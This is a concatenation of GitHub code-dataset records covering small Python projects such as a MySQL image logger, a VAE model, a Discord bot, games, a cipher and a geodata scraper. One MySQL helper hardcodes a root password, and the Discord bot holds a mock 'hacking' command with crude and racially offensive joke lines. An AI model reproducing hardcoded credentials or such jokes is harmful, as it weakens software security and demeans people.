r_time = time.strftime(\"%I:%M %p\",time.localtime())\r\n predicted_value = predict_value(image)\r\n insert_tuple = (uploaded_date, r_date, uploaded_time, r_time, image, predicted_value)\r\n cursor.execute(query, insert_tuple)\r\n connection.commit()\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed inserting data into MySQL table {}\".format(error))\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n finally:\r\n if connection.is_connected():\r\n cursor.close()\r\n connection.close()\r\n\r\ndef retrieveIMAGEDATA():\r\n final_array = []\r\n try:\r\n connection = mysql.connector.connect(\r\n host=\"127.0.0.1\",\r\n user=\"root\",\r\n database=\"mydatabase\",\r\n password=\"Deepak@973\"\r\n )\r\n\r\n cursor = connection.cursor()\r\n query = \"\"\"SELECT DATE, TIME, IMAGE, PREDICTED_VALUE FROM IMAGEDATA ORDER BY UPLOADED_DATE DESC,UPLOADED_TIME DESC LIMIT 5\"\"\"\r\n cursor.execute(query)\r\n record = cursor.fetchall()\r\n for row in record:\r\n sub_dict = dict()\r\n sub_dict[\"uploaded_date\"] = str(row[0])\r\n sub_dict[\"uploaded_time\"] = str(row[1])\r\n sub_dict[\"image\"] = base64.b64encode(row[2]).decode('utf-8')\r\n sub_dict[\"predicted_value\"] = str(row[3])\r\n final_array.append(sub_dict)\r\n connection.commit()\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed inserting data into MySQL table {}\".format(error))\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n finally:\r\n if connection.is_connected():\r\n cursor.close()\r\n connection.close()\r\n return final_array\r\n","repo_name":"Deepak973-create/Photo-Sign-Detection","sub_path":"my_project/my_library.py","file_name":"my_library.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70023404375","text":"\"\"\" Compute average energy in input bins.\n\"\"\"\nimport sys\nfrom copy import copy\n\nfrom pyrate.core.Algorithm import Algorithm\n\n\nclass AverageBinEnergy(Algorithm):\n __slots__ = 
()\n\n def __init__(self, name, store, logger):\n super().__init__(name, store, logger)\n\n def execute(self, config):\n\n e = self.store.get(\"EVENT:nT:edepScint\")\n\n self.store.put(config[\"name\"], e)\n\n\n# EOF\n","repo_name":"fscutti/pyrate","sub_path":"pyrate/algorithms/muondet/AverageBinEnergy.py","file_name":"AverageBinEnergy.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29439243256","text":"# rosalind_lgis.txt\nimport sys\nimport numpy as np \n\nf = sys.argv[1]\n\nnum_list = []\nwith open(f,'r') as handle:\n for line in handle:\n line = line.replace('\\n','')\n num_list.append(line.split(' ')) \nx = []\nfor i in num_list:\n for j in i:\n x.append(int(j))\n\nx1 = x[:30]\n'''\ni_count = {}\nd_count = {}\nfor i in range(len(x1)):\n if i == 0:\n i_count[x1[i]] = 1\n d_count[x1[i]] = 1\n elif max(list(i_count.keys())) < x1[i]:\n i_count[x1[i]] = max(i_count.keys())+1\n elif max(i_count.keys()) > x1[i]:\n i_count[x1[i]] = max(i_count.keys()< x1[i]) +1\n\nprint(i_count)\n'''\nd = {1:2,2:3,4:5,6:8,3:2}\nprint(max(list(d.keys())) < 5)\n","repo_name":"kjh918/rosalind","sub_path":"Bioinformatics_Stronghold/rosalind_LIS2.py","file_name":"rosalind_LIS2.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40511390855","text":"from typing import Literal, Tuple\n\nimport torch\nimport torch.nn as nn\n\nfrom src.layers.initialization import weights_init\nfrom src.training.loss import ReconstructionLoss\nfrom .base import BaseModel, TrainingInit\n\n\nclass VariationalAutoEncoder(BaseModel):\n def __init__(self,\n encoder: nn.Sequential,\n latent: nn.Module,\n decoder: nn.Sequential,\n recons_loss: ReconstructionLoss,\n latent_loss: nn.Module,\n training: TrainingInit,\n ):\n super().__init__(training)\n self.encoder = encoder\n self.decoder = decoder\n self.latent = latent\n self.recons_loss = recons_loss\n self.latent_loss = latent_loss\n\n self.reset_parameters()\n\n def reset_parameters(self):\n weights_init(self.encoder)\n weights_init(self.decoder)\n\n def forward(self, inputs):\n h = self.encoder(inputs)\n z, params = self.latent(h)\n recons = self.decoder(z)\n return recons, z, params\n\n def embed(self, inputs):\n return self.latent(self.encoder(inputs))[0]\n\n def decode(self, z):\n return self.decoder(z)\n\n def posterior(self, inputs):\n return self.latent(self.encoder(inputs))[1]\n\n def _step(\n self,\n batch: Tuple[torch.Tensor, torch.Tensor],\n batch_idx: int,\n phase: Literal[\"train\", \"val\", \"test\"]\n ):\n is_train = phase == \"train\"\n if is_train and hasattr(self.latent_loss, \"update_parameters\"):\n self.latent_loss.update_parameters(self.global_step)\n\n inputs, targets = batch\n recons, z, params = self.forward(inputs)\n\n recons_loss = self.recons_loss(recons, targets)\n latent_loss = self.latent_loss(z, params)\n\n loss = recons_loss + latent_loss\n\n self.log_dict(\n {\n f\"{phase}/loss\": loss,\n f\"{phase}/latent_term\": latent_loss,\n f\"{phase}/reconstruction_loss\": recons_loss\n },\n on_epoch=not is_train,\n on_step=is_train,\n prog_bar=is_train,\n sync_dist=not is_train,\n rank_zero_only=True\n )\n\n return loss\n","repo_name":"miltonllera/ocdm","sub_path":"src/model/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} 
+{"seq_id":"11665353399","text":"num = input()\n\ndial = ['ABC', 'DEF', 'GHI', 'JKL', 'MNO', 'PQRS', 'TUV', 'WXYZ']\ntime = 0\n\nfor n in num:\n for d in dial:\n if n in d:\n time += dial.index(d)+3\n\nprint(time)","repo_name":"SsoYeon-kim/CodingTest-Python","sub_path":"BJ/step_06/5622.py","file_name":"5622.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33727350735","text":"from git import Repo\nimport argparse\n\nimport chain_runner\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description='index_generator_chain_runner.py --project-dir '\n '--project-id --branch ')\n parser.add_argument('-pd', '--project-dir', help='Project directory for indexing ', required=True)\n parser.add_argument('-pi', '--project-id', help='Project Id', required=True)\n parser.add_argument('-b', '--branch', help='Branch', required=False)\n args = parser.parse_args()\n\n return args.project_dir, args.project_id, args.branch\n\n\nrepo_directory, project_id, branch = parse_arguments()\n\nprint('project_dir = ' + repo_directory)\nprint('project_id = ' + project_id)\n\nrepo = Repo(repo_directory)\n\nrepo.git.checkout(\"develop\")\nrepo.remotes.origin.fetch()\ncommits_behind = repo.iter_commits('develop..develop@{u}')\ncommits = list(commits_behind)\n\nif len(commits) == 0:\n print(\"Current branch is {} behind. Pulling new code\".format(len(commits)))\n repo_is_dirty = repo.is_dirty()\n if repo_is_dirty:\n print(\"Dirty\")\n print(\"Stashing...\")\n repo.git.stash('save')\n\n repo.remotes.origin.pull()\n chain_runner.generate_index_and_send(repo_directory, project_id)\n\n if repo_is_dirty:\n print(\"unstashing\")\n repo.git.stash('pop')\nelse:\n print(\"No updates nothing to do here\")\n","repo_name":"damintsew/idea-shared-index-standalone-runner","sub_path":"remote_git_checker.py","file_name":"remote_git_checker.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"13733780478","text":"import discord\nimport random\nimport asyncio\nfrom discord.ext import commands\nfrom discord.ext.commands import has_permissions, CheckFailure\n\n\nclass Interaction(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=[\"dankr8\"])\n async def dankrater(self, ctx):\n v = [\"100%\",\n \"99%\",\n \"98%\",\n \"95%\",\n \"87%\",\n \"85%\",\n \"82%\",\n \"80%\",\n \"76%\",\n \"74%\",\n \"70%\",\n \"69%\",\n \"65%\",\n \"54%\",\n \"57%\",\n \"50%\",\n \"49%\"\n \"45%\",\n \"47%\",\n \"42%\",\n \"40%\",\n \"36%\",\n \"35%\",\n \"25%\",\n \"23%\",\n \"18%\",\n \"15%\",\n \"13%\",\n \"10%\",\n \"7%\",\n \"5%\",\n \"3%\",\n \"2%\",\n \"1%\"]\n embed=discord.Embed(color=0x0338b5)\n embed.add_field(name=\"Dank r8 machine\", value=f\"Il tuo potenziale memetico è: **{random.choice(v)}**\", inline=False)\n await ctx.send(embed=embed)\n\n @commands.command()\n async def say(self, ctx, *, arg):\n if (arg) == \"Sono stupido\":\n await ctx.send(\"Lo sappiamo.\")\n elif (arg) == \"sono stupido\":\n await ctx.send(\"Lo sappiamo.\")\n elif (arg) == \"Sono uno stupido\":\n await ctx.send(\"Lo sappiamo.\")\n elif (arg) == \"sono uno stupido\":\n await ctx.send(\"Lo sappiamo.\")\n else:\n await ctx.send(f\"{arg} \\n\\n\\n- **{ctx.author}**\")\n\n # Command of questions. 
The bot send a random response for any type of question\n @commands.command(aliases=[\"8ball\", \"oracolo\", \"predizione\", \"domanda\"])\n async def erdubbio(self, ctx, *, question):\n responses = [\"E' certo.\",\n \"E' stato deciso così.\",\n \"Senza dubbio.\",\n \"Già....indubbiamente.\",\n \"Contaci.\",\n \"Per come la vedo io, si.\",\n \"Preferibilmente.\",\n \"Vedila così.\",\n \"Sì.\",\n \"Un punto in più per il 'Sì'.\",\n \"uhm... Sono un po' confuso, potresti ripetere la domanda?\",\n \"Chiedimelo più tardi..\",\n \"E' meglio non dirtelo ora.\",\n \"Mi risulta difficile predirlo ora.\",\n \"Concentrati e chiedimelo di nuovo.\",\n \"Non ci contare.\",\n \"La mia risposta è no.\",\n \"Le mie fonti dicono di no.\",\n \"Pessima prospettiva.\",\n \"Dubito.\"]\n embed = discord.Embed(color=0xa7c7fb)\n embed.add_field(name=\"(?) ErDubbio (?)\", value=\"*Poni le tue più strambe domande a questo magnifico oracolo dotato di tanta saggezza e righe di codice\", inline=False)\n embed.add_field(name=\":question: Domandona:\", value=f\"{question}\", inline=True)\n embed.add_field(name=\":speech_left: Risposta epica:\", value=f\"{random.choice(responses)}\", inline=True)\n embed.set_footer(text=\"Leonardus Project\")\n await ctx.send(embed=embed)\n\n @commands.command(aliases=[\"hack\"])\n async def akeraggio(self, ctx, member: commands.MemberConverter):\n message = await ctx.send(f\"Sto hackerando con paint {member}...\")\n await asyncio.sleep(2)\n await message.edit(content='Sono penetrato nel sistema!')\n await asyncio.sleep(3)\n await message.delete()\n await asyncio.sleep(0.2)\n message = await ctx.send(\"[▙] Eseguo un leak dell'email discord...(2fa Bypass)\")\n await asyncio.sleep(3)\n await message.edit(content=\"[▛] **Gotcha!**\")\n email = await ctx.send(f\"**EMAIL:** `{member}@email.net` \\n**PASSWORD:** `PASSW0RD`\")\n await asyncio.sleep(4)\n await message.delete()\n await email.delete()\n await asyncio.sleep(0.1)\n message = await ctx.send(\"[▟] Spio i messaggi recenti...\")\n await asyncio.sleep(2)\n dms = [\"send nudes\",\n \"Ammetto che adoro i canditi\",\n \"Napoli merda\",\n \"Tifo Juve\",\n \"Ieri ho rubato 2 orologi\",\n \"Cyca mala criminale\",\n \"mlmlml, che belli i bimbi neri\"]\n await message.edit(content=f\"**Leak degli ultimi dms**: '`{random.choice(dms)}`'\")\n await asyncio.sleep(3)\n await message.edit(content=f\"[▙] Rubo le credenziali di steam...\")\n await asyncio.sleep(3)\n await message.edit(content=f\"[▛] Credenziali di steam rubate :)\")\n await asyncio.sleep(2)\n await message.edit(content=f\"[▜] Traccio l'IP...\")\n await asyncio.sleep(3)\n await message.edit(content=f\"[▟] **IP TROVATO:** `127.0.0.1`\")\n await asyncio.sleep(2)\n await message.edit(content=f\"[▙] Scopro la cronologia...\")\n await asyncio.sleep(3)\n await message.edit(content=f\"**CRONOLOGIA TROVATA** \\n*Lista:* \\n`How to buil a bomb`\\n`How to kidnapp`\\n`Come dichiarare le variabili in HTML`\")\n await asyncio.sleep(5)\n await message.edit(content=f\"*Rivendo i dati al governo...*\")\n await asyncio.sleep(3)\n await message.edit(content=f\"*Rendo {member} ricercato in 5 paesi differenti...*\")\n await asyncio.sleep(4)\n await message.edit(content=f\"*Infetto il computer di {member} con diversi virus...*\")\n await asyncio.sleep(2)\n await message.edit(content=f\"Fine. 
*{member}* è stato hackerato!\")\n await ctx.send(\"Processo di hackeraggio **100%** *reale* e *pericoloso* terminato.\")\n\n\n\n\n\n\n\ndef setup(client):\n client.add_cog(Interaction(client))","repo_name":"sl04zy/Leonardus-Project","sub_path":"src/cogs/Interaction.py","file_name":"Interaction.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"it","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"72758450134","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on: Friday December 17th of January 2020\n\nAuthor: Daniel Cortild (https://github.com/DanielCortild)\n\nTicTacToe Judger Module\nThe Judger Monitors the Game\n\"\"\"\n\nfrom modules.state import State\n\nclass Judger:\n\n def __init__ ( self, p1, p2, learning = True ):\n\n self.p1 = p1\n self.p1Symbol = 1\n self.p1.setSymbol( self.p1Symbol )\n\n self.p2 = p2\n self.p2Symbol = -1\n self.p2.setSymbol( self.p2Symbol )\n\n self.currentPlayer = None\n\n self.learning = learning\n\n self.currentState = State()\n\n def giveReward ( self ):\n\n if self.currentState.winner == self.p1Symbol:\n\n self.p1.feedReward(1)\n self.p2.feedReward(0)\n\n elif self.currentState.winner == self.p2Symbol:\n\n self.p1.feedReward(0)\n self.p2.feedReward(1)\n\n else:\n\n self.p1.feedReward(0.5)\n self.p2.feedReward(0.5)\n\n def feedCurrentState ( self ):\n\n self.p1.feedState( self.currentState )\n self.p2.feedState( self.currentState )\n\n def reset ( self ):\n\n self.p1.reset()\n self.p2.reset()\n\n self.currentState = State()\n self.currentPlayer = None\n\n def play ( self, show = False ):\n\n self.reset()\n self.feedCurrentState()\n\n if show:\n self.currentState.show()\n\n while True:\n\n if self.currentPlayer == self.p1:\n self.currentPlayer = self.p2\n else:\n self.currentPlayer = self.p1\n\n [i, j, symbol] = self.currentPlayer.takeAction()\n\n self.currentState = self.currentState.nextState( i, j, symbol )\n hashValue = self.currentState.getHash()\n\n self.feedCurrentState()\n\n if show:\n self.currentState.show()\n\n if self.currentState.isEnd():\n\n if self.learning:\n self.giveReward()\n\n return self.currentState.winner\n","repo_name":"DanielCortild/TicTacToe","sub_path":"Python/modules/judger.py","file_name":"judger.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11780679149","text":"def encrypt(s,key):\n n=len(s)\n matrix=[[0 for _ in range(n)] for _ in range(key)]\n bool=False\n i=0\n j=0\n for k in range(n):\n matrix[i][j]=s[k]\n k+=1\n if i==0 or i==key-1:\n bool=not bool\n \n if bool:\n i+=1\n else:\n i-=1\n j+=1\n\n ans=\"\"\n for i in range(key):\n for j in range(n):\n if matrix[i][j]!=0:\n ans+=matrix[i][j]\n return ans\n\n\ns=input(\"Enter the string to be encrypted : \")\nk=int(input(\"Enter the key value of rail fence : \"))\nnew=encrypt(s,k)\nprint(\"The encrypted String is : \" , new)","repo_name":"Iamayushgupta/Blockchain","sub_path":"cryptography/rail_fence.py","file_name":"rail_fence.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31142745079","text":"# Ask the user for a number and determine whether the number is prime or not.\n# (For those who have forgotten, a prime number is a number that has no divisors.).\n# You can (and should!) 
use your answer in Exercise 4 to help you.\n# Take this opportunity to practice using functions, described below\n\n\ndef is_divisor(num, divisor):\n return num % divisor == 0\n\n\ndef is_prime(num):\n count = 0\n for i in range(2, num):\n if is_divisor(num, i):\n count += 1\n if count == 0:\n return True\n else:\n return False\n\n\nprime_number = int(input(\"Please enter a number: \"))\nprint(is_prime(prime_number))\n\n","repo_name":"nitzanpap/practiceAndExercises","sub_path":"pythonExercises/exercise11.py","file_name":"exercise11.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"33057914787","text":"\nimport tensorflow as tf\nfrom model.common import conv2d_bn_mish\n\ndef spp(x):\n pool_sizes = [5, 9, 13]\n pooling_results = [tf.keras.layers.MaxPooling2D((pool_size,pool_size), strides=(1, 1),padding='same')(x) for pool_size in pool_sizes]\n spp_result = tf.keras.layers.Concatenate()(pooling_results+[x])\n spp_result = conv2d_bn_mish(spp_result, x.shape[3], (1, 1))\n return spp_result\n\n","repo_name":"wangermeng2021/Scaled-YOLOv4-tensorflow2","sub_path":"model/spp.py","file_name":"spp.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"67"} +{"seq_id":"71577354132","text":"import sys\nfrom obj.BibliotekaObj import Biblioteka\nimport utils.constants as c\nimport utils.db as db\nimport utils.utils as u\n\nTEST_MODE = False\n\ndef sprawdzCzyTrybTestowy():\n if len(sys.argv) > 1:\n if sys.argv[1] == 'test':\n TEST_MODE = True\n print(\"Uruchomiono w trybie testowym...\")\n\nif __name__ == \"__main__\":\n sprawdzCzyTrybTestowy()\n db.inicjujDane()\n biblioteka = Biblioteka(TEST_MODE)\n biblioteka.ladujBiblioteke()\n while True:\n menuWybor = u.czyscWejscie(input(c.ASCII_MENU), trybTestowania=TEST_MODE)\n if (menuWybor == '1'):\n biblioteka.dodajKsiazke()\n elif (menuWybor == '2'):\n biblioteka.wypozyczKsiazke()\n elif (menuWybor == '3'):\n biblioteka.oddajKsiazke()\n elif (menuWybor == '4'):\n biblioteka.podejrzyjHistorieKsiazki()\n elif (menuWybor == '5'):\n biblioteka.dodajCzytacza()\n elif (menuWybor == '6'):\n print(f\"Zamykanie programu...\")\n break\n else:\n print(\"Wybrano nie istniejącą opcję w menu...\")\n SystemExit(0)\n","repo_name":"gkk-dev-ops/py-beginner-exercises","sub_path":"Projekt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10208812690","text":"# -*- encoding: utf-8 -*-\n# pylint: disable=E0203,E1101,C0111\n\"\"\"\n@file\n@brief Runtime operator.\n\"\"\"\nimport numpy\nfrom ._op import OpRun\n\n\nclass ZipMapDictionary(dict):\n \"\"\"\n Custom dictionary class much faster for this runtime,\n it implements a subset of the same methods.\n \"\"\"\n __slots__ = ['_rev_keys', '_values', '_mat']\n\n @staticmethod\n def build_rev_keys(keys):\n res = {}\n for i, k in enumerate(keys):\n res[k] = i\n return res\n\n def __init__(self, rev_keys, values, mat=None):\n \"\"\"\n @param rev_keys returns by @see me build_rev_keys,\n *{keys: column index}*\n @param values values\n @param mat matrix if values is a row index,\n one or two dimensions\n \"\"\"\n if mat is not None:\n if not isinstance(mat, numpy.ndarray):\n raise TypeError( # pragma: no cover\n f'matrix is expected, got {type(mat)}.')\n if len(mat.shape) not in (2, 3):\n raise ValueError( # pragma: no 
cover\n f\"matrix must have two or three dimensions but got {mat.shape}.\")\n dict.__init__(self)\n self._rev_keys = rev_keys\n self._values = values\n self._mat = mat\n\n def __getstate__(self):\n \"\"\"\n For pickle.\n \"\"\"\n return dict(_rev_keys=self._rev_keys,\n _values=self._values,\n _mat=self._mat)\n\n def __setstate__(self, state):\n \"\"\"\n For pickle.\n \"\"\"\n if isinstance(state, tuple):\n state = state[1]\n self._rev_keys = state['_rev_keys']\n self._values = state['_values']\n self._mat = state['_mat']\n\n def __getitem__(self, key):\n \"\"\"\n Returns the item mapped to keys.\n \"\"\"\n if self._mat is None:\n return self._values[self._rev_keys[key]]\n return self._mat[self._values, self._rev_keys[key]]\n\n def __setitem__(self, pos, value):\n \"unused but used by pickle\"\n pass\n\n def __len__(self):\n \"\"\"\n Returns the number of items.\n \"\"\"\n return len(self._values) if self._mat is None else self._mat.shape[1]\n\n def __iter__(self):\n for k in self._rev_keys:\n yield k\n\n def __contains__(self, key):\n return key in self._rev_keys\n\n def items(self):\n if self._mat is None:\n for k, v in self._rev_keys.items():\n yield k, self._values[v]\n else:\n for k, v in self._rev_keys.items():\n yield k, self._mat[self._values, v]\n\n def keys(self):\n for k in self._rev_keys.keys():\n yield k\n\n def values(self):\n if self._mat is None:\n for v in self._values:\n yield v\n else:\n for v in self._mat[self._values]:\n yield v\n\n def asdict(self):\n res = {}\n for k, v in self.items():\n res[k] = v\n return res\n\n def __str__(self):\n return f\"ZipMap({str(self.asdict())!r})\"\n\n\nclass ArrayZipMapDictionary(list):\n \"\"\"\n Mocks an array without changing the data it receives.\n Notebooks :ref:`onnxnodetimerst` illustrates the weaknesses\n and the strengths of this class compare to a list\n of dictionaries.\n\n .. 
index:: ZipMap\n \"\"\"\n\n def __init__(self, rev_keys, mat):\n \"\"\"\n @param rev_keys dictionary *{keys: column index}*\n @param mat matrix if values is a row index,\n one or two dimensions\n \"\"\"\n if mat is not None:\n if not isinstance(mat, numpy.ndarray):\n raise TypeError( # pragma: no cover\n f'matrix is expected, got {type(mat)}.')\n if len(mat.shape) not in (2, 3):\n raise ValueError( # pragma: no cover\n f\"matrix must have two or three dimensions but got {mat.shape}.\")\n list.__init__(self)\n self._rev_keys = rev_keys\n self._mat = mat\n\n @property\n def dtype(self):\n return self._mat.dtype\n\n def __len__(self):\n return self._mat.shape[0]\n\n def __iter__(self):\n for i in range(len(self)):\n yield self[i]\n\n def __getitem__(self, i):\n return ZipMapDictionary(self._rev_keys, i, self._mat)\n\n def __setitem__(self, pos, value):\n raise RuntimeError(\n f\"Changing an element is not supported (pos=[{pos}]).\")\n\n @property\n def values(self):\n \"\"\"\n Equivalent to ``DataFrame(self).values``.\n \"\"\"\n if len(self._mat.shape) == 3:\n return self._mat.reshape((self._mat.shape[1], -1))\n return self._mat\n\n @property\n def columns(self):\n \"\"\"\n Equivalent to ``DataFrame(self).columns``.\n \"\"\"\n res = [(v, k) for k, v in self._rev_keys.items()]\n if len(res) == 0:\n if len(self._mat.shape) == 2:\n res = [(i, 'c%d' % i) for i in range(self._mat.shape[1])]\n elif len(self._mat.shape) == 3:\n # multiclass\n res = [(i, 'c%d' % i)\n for i in range(self._mat.shape[0] * self._mat.shape[2])]\n else:\n raise RuntimeError( # pragma: no cover\n \"Unable to guess the right number of columns for \"\n \"shapes: {}\".format(self._mat.shape))\n else:\n res.sort()\n return [_[1] for _ in res]\n\n @property\n def is_zip_map(self):\n return True\n\n def __str__(self):\n return f\"ZipMaps[{', '.join(map(str, self))}]\"\n\n\nclass ZipMap(OpRun):\n \"\"\"\n The class does not output a dictionary as\n specified in :epkg:`ONNX` specifications\n but a @see cl ArrayZipMapDictionary which\n is wrapper on the input so that it does not\n get copied.\n \"\"\"\n\n atts = {'classlabels_int64s': [], 'classlabels_strings': []}\n\n def __init__(self, onnx_node, desc=None, **options):\n OpRun.__init__(self, onnx_node, desc=desc,\n expected_attributes=ZipMap.atts,\n **options)\n if hasattr(self, 'classlabels_int64s') and len(self.classlabels_int64s) > 0:\n self.rev_keys_ = ZipMapDictionary.build_rev_keys(\n self.classlabels_int64s)\n elif hasattr(self, 'classlabels_strings') and len(self.classlabels_strings) > 0:\n self.rev_keys_ = ZipMapDictionary.build_rev_keys(\n self.classlabels_strings)\n else:\n self.rev_keys_ = {}\n\n def _run(self, x, attributes=None, verbose=0, fLOG=None): # pylint: disable=W0221\n res = ArrayZipMapDictionary(self.rev_keys_, x)\n return (res, )\n","repo_name":"sdpython/mlprodict","sub_path":"mlprodict/onnxrt/ops_cpu/op_zipmap.py","file_name":"op_zipmap.py","file_ext":"py","file_size_in_byte":6872,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"67"} +{"seq_id":"1119918561","text":"from cartoframes.auth import set_default_credentials\nfrom cartoframes import read_carto, to_carto\nimport geopandas as gpd\nimport pandas as pd\nimport os\nfrom shapely.validation import make_valid\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nimport glob\nimport json\n\nfrom dotenv import load_dotenv\nload_dotenv('/home/chemmerly/cred/.env')\n\ndata_dir = \"data\"\n\n#download list of EBSA data urls from 
https://chm.cbd.int/database\nraw_data_file = 'Aichi-Targets-data.csv'\n\n# read in the csv with the urls for the EBSA jsons\nurl_df = pd.read_csv(raw_data_file,encoding='latin-1')\nurl_list = url_df['CHM Url']\n\n# regex pattern for the finding a geojson \nmatch_st = re.compile(r'geojson') \nfor url in url_list:\n # scrape the page for the geojson\n r = requests.get(url) \n c = r.content \n soup = BeautifulSoup(c)\n for link in soup.findAll('a', attrs={'href': re.compile(\"geojson$\")}):\n href = link.get('href')\n url = 'https://chm.cbd.int' + href\n # download raw data\n r = requests.get(url)\n j = json.loads(r.content)\n #store data as geojson files\n raw_data_file = os.path.join(data_dir, os.path.basename(url))\n with open(raw_data_file, \"w\") as file:\n json.dump(j, file)\n\n#create list of geojson data for each ebsa from stored geojson file\nebsa_files = glob.glob(os.path.join(data_dir, '*geojson'))\ngdf_list = []\nfor file in ebsa_files:\n try:\n gdf = gpd.read_file(file)\n gdf_list.append(gdf)\n except Exception:\n print(\"Could not read \" + file)\n\n#create geopandas dataframe of EBSA data from list\ngdf_ebsa = gpd.GeoDataFrame(pd.concat(gdf_list))\n\n#store EBSA data locally as shapefiles\ngdf_ebsa.to_file('merged_ebsa.shp',driver='ESRI Shapefile')\n\n#upload EBSA data to Carto\ngdf_ebsa.columns = [x.lower().replace(' ', '_') for x in gdf_ebsa.columns]\ndataset_name = \"Ecologically and Biologically Significant Areas\"\nCARTO_USER = os.getenv('CARTO_WRI_RW_USER')\nCARTO_KEY = os.getenv('CARTO_WRI_RW_KEY')\nset_default_credentials(username=CARTO_USER, base_url=\"https://{user}.carto.com/\".format(user=CARTO_USER),api_key=CARTO_KEY)\nto_carto(gdf_ebsa, dataset_name + '_edit', if_exists='replace')","repo_name":"clairehemmerly/ocean_watch","sub_path":"EBSA_files_fetch.py","file_name":"EBSA_files_fetch.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26321872271","text":"import pygame\npygame.init()\nwidth, height = 1280, 720\nwindow = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"My Awesome Game\")\nfps = 30\nclock = pygame.time.Clock()\nstart = True\nwhile start:\n # Get Events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n start = False\n pygame.quit()\n window.fill((240, 143, 250))\n yellow,pink,green = (253,235,8),(253,8,200),(58,223,117)\n pygame.draw.polygon(window,yellow,((491, 100), (788, 100), (937, 357),(788, 614), (491, 614), (342, 357)))\n pygame.draw.circle(window, green, (640, 360), 200)\n pygame.draw.line(window, pink, (468, 392), (812, 392), 10)\n pygame.draw.rect(window, pink, (468, 307, 345, 70), border_radius=5)\n\n\n # Update Display\n pygame.display.update()\n # Set FPS\n clock.tick(fps)","repo_name":"kirankuyate2157/python_programs","sub_path":"download_proggrams/Game_development_opencv-main/game_dev/draw_shapes.py","file_name":"draw_shapes.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"2787667447","text":"import numpy as np\nimport tensorflow as tf\n\nfrom surreal.spaces.primitive_spaces import PrimitiveSpace, Bool, Int, Float, Text\nfrom surreal.spaces.container_spaces import ContainerSpace, Dict, Tuple\nfrom surreal.utils.errors import SurrealError, SurrealSpaceError\nfrom surreal.utils.util import convert_dtype, LARGE_INTEGER, force_tuple\n\n\n# TODO: replace completely by `Component.get_variable` 
(python-backend)\ndef get_list_registry(from_space, capacity=None, initializer=0, flatten=True, add_batch_rank=False):\n \"\"\"\n Creates a list storage for a space by providing an ordered dict mapping space names\n to empty lists.\n\n Args:\n from_space: Space to create registry from.\n capacity (Optional[int]): Optional capacity to initialize list.\n initializer (Optional(any)): Optional initializer for list if capacity is not None.\n flatten (bool): Whether to produce a FlattenedDataOp with auto-keys.\n\n add_batch_rank (Optional[bool,int]): If from_space is given and is True, will add a 0th rank (None) to\n the created variable. If it is an int, will add that int instead of None.\n Default: False.\n\n Returns:\n dict: Container dict mapping core to empty lists.\n \"\"\"\n if flatten:\n if capacity is not None:\n var = from_space.flatten(\n custom_scope_separator=\"-\", scope_separator_at_start=False,\n mapping=lambda k, primitive: [initializer for _ in range(capacity)]\n )\n else:\n var = from_space.flatten(\n custom_scope_separator=\"-\", scope_separator_at_start=False,\n mapping=lambda k, primitive: []\n )\n else:\n if capacity is not None:\n var = [initializer for _ in range(capacity)]\n else:\n var = []\n return var\n\n\ndef get_space_from_data(data, num_categories=None, main_axes=None):\n \"\"\"\n Tries to re-create a Space object given some DataOp (e.g. a tf op).\n This is useful for shape inference on returned ops after having run through a graph_fn.\n\n Args:\n data (any): The data to create a corresponding Space for.\n\n num_categories (Optional[int]): An optional indicator, what the `num_categories` property for\n an Int should be.\n\n Returns:\n Space: The inferred Space object.\n \"\"\"\n # Dict.\n if isinstance(data, dict):\n spec = {}\n for key, value in data.items():\n\n # OBSOLETE THIS! 
